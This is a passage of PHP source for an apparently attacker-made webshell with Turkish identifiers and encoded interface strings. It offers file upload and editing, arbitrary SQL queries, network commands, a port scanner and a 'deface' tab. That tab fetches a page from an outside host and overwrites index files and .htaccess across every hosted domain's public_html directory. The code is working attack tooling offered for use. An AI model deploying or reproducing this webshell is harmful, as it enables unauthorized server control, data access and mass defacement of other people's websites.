                        $dosya_adi = basename($_FILES['yuklenecek_dosya']['name']);
                        $hedef_yol = $hedef_dizin . '/' . $dosya_adi;
                        if (@move_uploaded_file($_FILES['yuklenecek_dosya']['tmp_name'], $hedef_yol)) {
                            echo "<p class='success'>" . moriarti_decode($upload_success_text) . htmlspecialchars($hedef_yol) . "</p>";
                        } else {
                            echo "<p class='error'>" . moriarti_decode($upload_error_text) . "</p>";
                        }
                    } else {
                        echo "<p class='error'>" . moriarti_decode($upload_select_error_text) . "</p>";
                    }
                }
            }
            ?>
        </div>

        <div id="dosya-duzenleme" class="tab-content">
            <h2><?php echo moriarti_decode($edit_file_header); ?></h2>
            <?php
            if (isset($_GET['islem']) && $_GET['islem'] == 'dosya_duzenle_form' && isset($_GET['dosya'])) {
                $dosya_yolu_base64 = $_GET['dosya'];
                $dosya_yolu = base64_decode(urldecode($dosya_yolu_base64));
                $dosya_yolu = realpath($dosya_yolu);
                if ($dosya_yolu && strpos($dosya_yolu, realpath(getcwd())) === 0 && is_file($dosya_yolu) && is_readable($dosya_yolu)) {
                    $dosya_icerigi = htmlspecialchars(file_get_contents($dosya_yolu));
                    ?>
                    <form method="post" action="?tab=dosya-duzenleme">
                        <input type="hidden" name="islem" value="dosya_duzenle">
                        <label for="duzenlenecek_dosya"><?php echo moriarti_decode($edit_file_path_label); ?></label>
                        <input type="text" id="duzenlenecek_dosya" name="duzenlenecek_dosya" value="<?php echo htmlspecialchars($dosya_yolu); ?>" readonly required><br>
                        <label for="dosya_icerigi"><?php echo moriarti_decode($file_content_label); ?></label>
                        <textarea id="dosya_icerigi" name="dosya_icerigi" rows="15"><?php echo $dosya_icerigi; ?></textarea><br>
                        <input type="submit" value="<?php echo moriarti_decode($save_button_text); ?>">
                    </form>
                    <?php
                } else {
                    echo "<p class='error'>" . moriarti_decode($file_not_readable_error) . "</p>";
                }
            }
            ?>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['islem']) && $_POST['islem'] == 'dosya_duzenle') {
                $duzenlenecek_dosya = isset($_POST['duzenlenecek_dosya']) ? $_POST['duzenlenecek_dosya'] : '';
                $dosya_icerigi = isset($_POST['dosya_icerigi']) ? $_POST['dosya_icerigi'] : '';
                $duzenlenecek_dosya = realpath($duzenlenecek_dosya);
                if (!$duzenlenecek_dosya || strpos($duzenlenecek_dosya, realpath(getcwd())) !== 0 || !is_file($duzenlenecek_dosya) || !is_writable($duzenlenecek_dosya)) {
                    echo "<p class='error'>" . moriarti_decode($invalid_path_error) . "</p>";
                } else {
                    if (@file_put_contents($duzenlenecek_dosya, $dosya_icerigi) !== false) {
                        echo "<p class='success'>" . moriarti_decode($file_edit_success_text) . htmlspecialchars($duzenlenecek_dosya) . "</p>";
                    } else {
                        echo "<p class='error'>" . moriarti_decode($file_edit_error_text) . "</p>";
                    }
                }
            }
            ?>
        </div>

        <div id="izin-kontrol" class="tab-content">
            <h2><?php echo moriarti_decode($permission_check_header); ?></h2>
            <form method="post" action="?tab=izin-kontrol">
                <input type="hidden" name="islem" value="izin_kontrol">
                <label for="izin_yolu"><?php echo moriarti_decode($permission_path_label); ?></label>
                <input type="text" id="izin_yolu" name="izin_yolu" value="<?php echo isset($_POST['izin_yolu']) ? htmlspecialchars($_POST['izin_yolu']) : getcwd(); ?>" required>
                <input type="submit" value="<?php echo moriarti_decode($check_button_text); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['islem']) && $_POST['islem'] == 'izin_kontrol') {
                $izin_yolu = isset($_POST['izin_yolu']) ? $_POST['izin_yolu'] : '';
                $izin_yolu = realpath($izin_yolu);
                if (!$izin_yolu || strpos($izin_yolu, realpath(getcwd())) !== 0) {
                    echo "<p class='error'>" . moriarti_decode($invalid_path_error) . "</p>";
                } else if (file_exists($izin_yolu)) {
                    $izin_modu = substr(sprintf('%o', fileperms($izin_yolu)), -4);
                    echo "<h3>" . moriarti_decode($permissions_header_text) . htmlspecialchars($izin_yolu) . "</h3>";
                    echo "<pre>" . moriarti_decode($permission_mode_text) . htmlspecialchars($izin_modu) . "</pre>";
                } else {
                    echo "<p class='error'>" . moriarti_decode($file_or_dir_not_found_error) . "</p>";
                }
            }
            ?>
        </div>

        <div id="kaynak-kodu" class="tab-content">
            <h2><?php echo moriarti_decode($source_code_header); ?></h2>
            <form method="post" action="?tab=kaynak-kodu">
                <input type="hidden" name="islem" value="kaynak_goster">
                <label for="kod_yolu"><?php echo moriarti_decode($php_file_path_label); ?></label>
                <input type="text" id="kod_yolu" name="kod_yolu" value="<?php echo isset($_POST['kod_yolu']) ? htmlspecialchars($_POST['kod_yolu']) : getcwd() . '/webshell.php'; ?>" required>
                <input type="submit" value="<?php echo moriarti_decode($show_button_text); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['islem']) && $_POST['islem'] == 'kaynak_goster') {
                $kod_yolu = isset($_POST['kod_yolu']) ? $_POST['kod_yolu'] : '';
                $kod_yolu = realpath($kod_yolu);
                if (!$kod_yolu || strpos($kod_yolu, realpath(getcwd())) !== 0 || !is_file($kod_yolu) || pathinfo($kod_yolu, PATHINFO_EXTENSION) !== 'php') {
                    echo "<p class='error'>" . moriarti_decode($invalid_php_file_error) . "</p>";
                } else if (is_readable($kod_yolu)) {
                    echo "<h3>" . moriarti_decode($source_code_display_header) . htmlspecialchars($kod_yolu) . "</h3>";
                    echo "<pre>";
                    echo highlight_file($kod_yolu, true);
                    echo "</pre>";
                } else {
                    echo "<p class='error'>" . moriarti_decode($file_not_readable_error) . "</p>";
                }
            }
            ?>
        </div>

        <div id="database-yonetimi" class="tab-content">
            <h2><?php echo moriarti_decode($db_manage_header); ?></h2>
            <form method="post" action="?tab=database-yonetimi">
                <input type="hidden" name="islem" value="database_yonetimi">
                <label for="db_sunucu"><?php echo moriarti_decode($db_server_label); ?></label>
                <input type="text" id="db_sunucu" name="db_sunucu" value="localhost">
                <label for="db_kullanici"><?php echo moriarti_decode($db_user_label); ?></label>
                <input type="text" id="db_kullanici" name="db_kullanici" value="root">
                <label for="db_sifre"><?php echo moriarti_decode($db_password_label); ?></label>
                <input type="password" id="db_sifre" name="db_sifre">
                <label for="db_adi"><?php echo moriarti_decode($db_name_label); ?></label>
                <input type="text" id="db_adi" name="db_adi">
                <label for="sql_sorgusu"><?php echo moriarti_decode($sql_query_label); ?></label>
                <textarea id="sql_sorgusu" name="sql_sorgusu" rows="5" placeholder="SELECT * FROM tablo_adi LIMIT 10"></textarea>
                <input type="submit" value="<?php echo moriarti_decode($execute_query_button); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['islem']) && $_POST['islem'] == 'database_yonetimi') {
                $db_sunucu = $_POST['db_sunucu'];
                $db_kullanici = $_POST['db_kullanici'];
                $db_sifre = $_POST['db_sifre'];
                $db_adi = $_POST['db_adi'];
                $sql_sorgusu = $_POST['sql_sorgusu'];
                if (!empty($sql_sorgusu)) {
                    $baglanti = @mysqli_connect($db_sunucu, $db_kullanici, $db_sifre, $db_adi);
                    if (!$baglanti) {
                        echo "<p class='error'>" . moriarti_decode($db_connect_error) . mysqli_connect_error() . "</p>";
                    } else {
                        echo "<h3>" . moriarti_decode($sql_result_header) . "</h3>";
                        $sonuc = @mysqli_query($baglanti, $sql_sorgusu);
                        if (!$sonuc) {
                            echo "<p class='error'>" . moriarti_decode($sql_query_error) . mysqli_error($baglanti) . "</p>";
                        } else {
                            if ($sonuc === true || $sonuc === false) {
                                echo "<p class='success'>" . moriarti_decode($sql_success_no_data) . mysqli_affected_rows($baglanti) . "</p>";
                            } else {
                                echo "<div class='output'><pre>";
                                $alanlar = mysqli_fetch_fields($sonuc);
                                echo "<table><tr>";
                                foreach ($alanlar as $alan) {
                                    echo "<th>" . htmlspecialchars($alan->name) . "</th>";
                                }
                                echo "</tr>";
                                while ($satir = mysqli_fetch_assoc($sonuc)) {
                                    echo "<tr>";
                                    foreach ($satir as $deger) {
                                        echo "<td>" . htmlspecialchars($deger) . "</td>";
                                    }
                                    echo "</tr>";
                                }
                                echo "</table></pre></div>";
                                mysqli_free_result($sonuc);
                            }
                        }
                        mysqli_close($baglanti);
                    }
                } else {
                    echo "<p class='error'>" . moriarti_decode($empty_command_error) . "</p>";
                }
            }
            ?>
            <style>
                #database-yonetimi .output pre table {
                    width: 100%;
                    border-collapse: collapse;
                }

                #database-yonetimi .output pre table,
                #database-yonetimi .output pre th,
                #database-yonetimi .output pre td {
                    border: 1px solid #555;
                    color: #f0f0f0;
                    padding: 8px;
                    text-align: left;
                }

                #database-yonetimi .output pre th {
                    background-color: #333;
                    color: #00ff00;
                }
            </style>
        </div>

        <div id="network-araclari" class="tab-content">
            <h2><?php echo moriarti_decode($network_tools_header); ?></h2>

            <h3><?php echo moriarti_decode($ping_header); ?></h3>
            <form method="post" action="?tab=network-araclari">
                <input type="hidden" name="arac" value="ping">
                <label for="ping_hedef"><?php echo moriarti_decode($ping_target_label); ?></label>
                <input type="text" id="ping_hedef" name="ping_hedef" value="www.google.com" required>
                <input type="submit" value="<?php echo moriarti_decode($ping_test_button); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['arac']) && $_POST['arac'] == 'ping') {
                $ping_hedef = $_POST['ping_hedef'];
                echo "<h3>" . moriarti_decode($ping_results_header) . htmlspecialchars($ping_hedef) . "</h3>";
                echo "<div class='output'><pre>";
                @passthru("ping -c 3 " . escapeshellarg($ping_hedef));
                echo "</pre></div>";
            }
            ?>
            <hr>

            <h3><?php echo moriarti_decode($traceroute_header); ?></h3>
            <form method="post" action="?tab=network-araclari">
                <input type="hidden" name="arac" value="traceroute">
                <label for="traceroute_hedef"><?php echo moriarti_decode($traceroute_target_label); ?></label>
                <input type="text" id="traceroute_hedef" name="traceroute_hedef" value="www.google.com" required>
                <input type="submit" value="<?php echo moriarti_decode($traceroute_button); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['arac']) && $_POST['arac'] == 'traceroute') {
                $traceroute_hedef = $_POST['traceroute_hedef'];
                echo "<h3>" . moriarti_decode($traceroute_results_header) . htmlspecialchars($traceroute_hedef) . "</h3>";
                echo "<div class='output'><pre>";
                @passthru("traceroute " . escapeshellarg($traceroute_hedef));
                echo "</pre></div>";
            }
            ?>
            <hr>

            <h3><?php echo moriarti_decode($whois_header); ?></h3>
            <form method="post" action="?tab=network-araclari">
                <input type="hidden" name="arac" value="whois">
                <label for="whois_hedef"><?php echo moriarti_decode($whois_domain_label); ?></label>
                <input type="text" id="whois_hedef" name="whois_hedef" value="google.com" required>
                <input type="submit" value="<?php echo moriarti_decode($whois_query_button); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['arac']) && $_POST['arac'] == 'whois') {
                $whois_hedef = $_POST['whois_hedef'];
                echo "<h3>" . moriarti_decode($whois_results_header) . htmlspecialchars($whois_hedef) . "</h3>";
                echo "<div class='output'><pre>";
                @passthru("whois " . escapeshellarg($whois_hedef));
                echo "</pre></div>";
            }
            ?>
            <hr>

            <h3><?php echo moriarti_decode($nslookup_header); ?></h3>
            <form method="post" action="?tab=network-araclari">
                <input type="hidden" name="arac" value="nslookup">
                <label for="nslookup_hedef"><?php echo moriarti_decode($nslookup_domain_label); ?></label>
                <input type="text" id="nslookup_hedef" name="nslookup_hedef" value="google.com" required>
                <input type="submit" value="<?php echo moriarti_decode($nslookup_query_button); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['arac']) && $_POST['arac'] == 'nslookup') {
                $nslookup_hedef = $_POST['nslookup_hedef'];
                echo "<h3>" . moriarti_decode($nslookup_results_header) . htmlspecialchars($nslookup_hedef) . "</h3>";
                echo "<div class='output'><pre>";
                @passthru("nslookup " . escapeshellarg($nslookup_hedef));
                echo "</pre></div>";
            }
            ?>
        </div>

        <div id="port-tarayici" class="tab-content">
            <h2><?php echo moriarti_decode($port_scan_header); ?></h2>
            <form method="post" action="?tab=port-tarayici">
                <input type="hidden" name="islem" value="port_tarayici">
                <label for="hedef_ip"><?php echo moriarti_decode($target_ip_label); ?></label>
                <input type="text" id="hedef_ip" name="hedef_ip" value="localhost" required>
                <label for="baslangic_port"><?php echo moriarti_decode($start_port_label); ?></label>
                <input type="text" id="baslangic_port" name="baslangic_port" value="1" required>
                <label for="bitis_port"><?php echo moriarti_decode($end_port_label); ?></label>
                <input type="text" id="bitis_port" name="bitis_port" value="100" required>
                <input type="submit" value="<?php echo moriarti_decode($scan_ports_button); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['islem']) && $_POST['islem'] == 'port_tarayici') {
                $hedef_ip = $_POST['hedef_ip'];
                $baslangic_port = intval($_POST['baslangic_port']);
                $bitis_port = intval($_POST['bitis_port']);
                echo "<h3>" . moriarti_decode($port_scan_results_header) . htmlspecialchars($hedef_ip) . ":" . $baslangic_port . "-" . $bitis_port . "</h3>";
                echo "<div class='output'><pre>";
                set_time_limit(60); // Tarama için zaman sınırı
                for ($port = $baslangic_port; $port <= $bitis_port; $port++) {
                    $servis_adi = getservbyport($port, 'tcp');
                    $servis_adi = $servis_adi ? $servis_adi : moriarti_decode($unknown_service_text);
                    $fp = @fsockopen($hedef_ip, $port, $errno, $errstr, 1);
                    if ($fp) {
                        echo "Port " . $port . " (" . $servis_adi . "): <span class='success'>" . moriarti_decode($open_text) . "</span>\n";
                        fclose($fp);
                    } else {
                        echo "Port " . $port . " (" . $servis_adi . "): <span class='error'>" . moriarti_decode($closed_text) . "</span>\n";
                    }
                }
                echo "</pre></div>";
            }
            ?>
        </div>

		<div id="deface-content" class="tab-content">
			<h2><?php echo moriarti_decode($deface_header); ?></h2>
			<div class="log-container">
				<form method="get" action="?tab=deface-content">
					<input type="hidden" name="opt" value="attack">
					<label for="path"><?php echo moriarti_decode($deface_target_dir_label); ?></label>
					<input type="text" id="path" name="path" value="<?php echo getcwd(); ?>" required>
					<label for="defaceSource"><?php echo moriarti_decode($deface_content_url_label); ?></label>
					<input type="text" id="defaceSource" name="defaceSource" value="https://moriartyhacked.vercel.app/index.html" required>
					<input type="submit" value="<?php echo moriarti_decode($deface_attack_button); ?>">
				</form>
				<?php
				if (isset($_GET["opt"]) && $_GET["opt"] == "attack") {
					ob_start();
					$GLOBALS['changed_domains'] = array();
					$path = $_GET["path"];
					if (!isset($_GET["defaceSource"])) {
						echo "<div class='log-entry error'>" . moriarti_decode($deface_log_error_prefix) . ": defaceSource parametresi gerekli</div>";
						die();
					}
					$defaceSource = @file_get_contents($_GET["defaceSource"]);
					if ($defaceSource === false) {
						echo "<div class='log-entry error'>" . moriarti_decode($deface_log_error_prefix) . ": " . moriarti_decode($deface_url_content_error) . "</div>";
						die();
					}

					function updateHomePageFiles($dir)
					{
						global $deface_dir_not_found;
						if (!is_dir($dir)) {
							echo "<div class='log-entry error'>" . moriarti_decode($deface_dir_not_found) . ": {$dir}</div>";
							return;
						}
						$handle = opendir($dir);
						if ($handle) {
							while (false !== ($entry = readdir($handle))) {
								if ($entry === '.' || $entry === '..') {
									continue;
								}
								$fullPath = $dir . '/' . $entry;
								if (is_dir($fullPath)) {
									if ($entry === 'public_html') {
										updateIndexFiles($fullPath, $GLOBALS['defaceSource']);
										$domainPath = dirname($fullPath);
										$domain = basename($domainPath);
										if (!in_array($domain, $GLOBALS['changed_domains'])) {
											$GLOBALS['changed_domains']= $domain;
										}
									} else {
										updateHomePageFiles($fullPath);
									}
								}
							}
							closedir($handle);
						}
					}

					function updateIndexFiles($publicHtmlPath, $defaceSource)
					{
						global $deface_changed_file_success;
						$indexFiles = ['index.html', 'index.php', 'default.php', 'default.html'];
						$foundIndexFile = false;
						foreach ($indexFiles as $file) {
							$filePath = $publicHtmlPath . '/' . $file;
							if (file_exists($filePath)) {
								$content = $defaceSource;
								@file_put_contents($filePath, $content);
								echo "<div class='log-entry success'>" . moriarti_decode($deface_changed_file_success) . ": {$filePath}</div>";
								$foundIndexFile = true;
							}
						}
						if (!$foundIndexFile) {
							$newIndexFilePath = $publicHtmlPath . '/index.html';
							$content = $defaceSource;
							@file_put_contents($newIndexFilePath, $content);
							global $deface_created_file_success;
							echo "<div class='log-entry success'>" . moriarti_decode($deface_created_file_success) . ": {$newIndexFilePath}</div>";
						}
						updateHtaccess($publicHtmlPath);
					}

					function updateHtaccess($publicHtmlPath)
					{
						global $deface_htaccess_changed_success, $deface_htaccess_created_success;
						$htaccessPath = $publicHtmlPath . '/.htaccess';
						if (file_exists($htaccessPath)) {
							$htaccessContent = "DirectoryIndex index.html\n";
							@file_put_contents($htaccessPath, $htaccessContent);
							echo "<div class='log-entry success'>" . moriarti_decode($deface_htaccess_changed_success) . ": {$htaccessPath}</div>";
						} else {
							$htaccessContent = "DirectoryIndex index.html\n";
							@file_put_contents($htaccessPath, $htaccessContent);
							echo "<div class='log-entry success'>" . moriarti_decode($deface_htaccess_created_success) . ": {$htaccessPath}</div>";
						}
					}

					$GLOBALS['defaceSource'] = $defaceSource;
					updateHomePageFiles($path);

					if (!empty($GLOBALS['changed_domains'])) {
						echo "<div class='domain-summary'>";
						echo "<h2>" . moriarti_decode($deface_summary_header) . "</h2>";
						echo "<div class='counter'>" . moriarti_decode($deface_total_domains_counter) . ": " . count($GLOBALS['changed_domains']) . "</div>";
						echo "<ul class='domain-list'>";
						sort($GLOBALS['changed_domains']);
						foreach ($GLOBALS['changed_domains'] as $domain) {
							echo "<li>➤ " . htmlspecialchars($domain) . "</li>";
						}
						echo "</ul>";
						echo "</div>";
					}
					echo "<div class='status success'>" . moriarti_decode($deface_operation_completed) . "</div>";
					echo "<div class='status success'>" . moriarti_decode($deface_coded_by) . "</div>";
					ob_end_flush();
				}
				?>
			</div>
		</div>

        <div id="guvenlik-modu" class="tab-content">
            <h2><?php echo moriarti_decode($security_mode_header); ?></h2>
            <pre><?php echo moriarti_decode($php_safe_mode_status); ?>: <?php echo ini_get(moriarti_decode($safe_mode_check)) ? moriarti_decode($on_text) : moriarti_decode($off_text); ?>HTTP User-Agent Başlığı (Mevcut): <?php echo $_SERVER['HTTP_USER_AGENT']; ?><?php echo moriarti_decode($user_agent_change_info); ?></pre>

            <h3><?php echo moriarti_decode($random_user_agent_header); ?></h3>
            <form>
                <label for="user_agent_secimi"><?php echo moriarti_decode($select_user_agent_label); ?></label>
                <select id="user_agent_secimi">
                    <option value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36">Chrome</option>
                    <option 1  value="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0">Firefox</option>
                    <option value="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/14.0">Safari</option>
                    <option value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Edg/91.0.864.59">Edge</option>
                    <option value="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)">Internet Explorer 9</option>
                    <option value="Opera/7.50 (Windows ME; U)">Opera 7.5</option>
                </select>
                <button type="button" onclick="showAlert()"><?php echo moriarti_decode($show_selected_ua_button); ?></button>
            </form>
            <p><?php echo moriarti_decode($random_wait_times_info); ?></p>
        </div>

        <hr>
        <p><?php echo moriarti_decode($security_warning_footer_p1); ?><?php echo $version; ?><?php echo moriarti_decode($security_warning_footer_p2); ?><a href="#" target="_blank"><?php echo moriarti_decode($security_warning_footer_p3); ?></a><?php echo moriarti_decode($security_warning_footer_p4); ?></p>
    </div>

    <script>
        function openTab(tabName, element) {
            var i, tabContent, tabButtons;
            tabContent = document.getElementsByClassName("tab-content");
            for (i = 0; i < tabContent.length; i++) {
                tabContent[i].classList.remove("active");
            }
            tabButtons = document.getElementsByClassName("tab-button");
            for (i = 0; i < tabButtons.length; i++) {
                tabButtons[i].classList.remove("active");
            }
            document.getElementById(tabName).classList.add("active");
            element.classList.add("active");

            // URL Hash ile Sekme Kalıcılığı
            window.location.hash = tabName;
        }

        function showAlert() {
            var selectBox = document.getElementById("user_agent_secimi");
            var selectedValue = selectBox.options[selectBox.selectedIndex].value;
            alert("Seçilen User-Agent: " + selectedValue + ". Bu değeri manuel testlerinizde kullanabilirsiniz.");
        }

        window.onload = function() {
            // URL Hash'ten Sekmeyi Aktifleştir
            if (window.location.hash) {
                var tabName = window.location.hash.substring(1); // # işaretini kaldır
                var tabButton = document.querySelector('.tab-button[onclick="openTab(\'' + tabName + '\', this)"]');
                if (tabButton) {
                    openTab(tabName, tabButton);
                } else {
                    openTab('sistem-bilgileri', document.querySelector('.tab-button[onclick="openTab(\'sistem-bilgileri\', this)"]')); // Varsayılan sekme
                }
            } else {
                openTab('sistem-bilgileri', document.querySelector('.tab-button[onclick="openTab(\'sistem-bilgileri\', this)"]')); // Varsayılan sekme
            }

             if (window.location.hash === '#dosya-yonetici') {
                document.getElementById('dizin').focus();
            }
        };
    </script>
</body>

</html>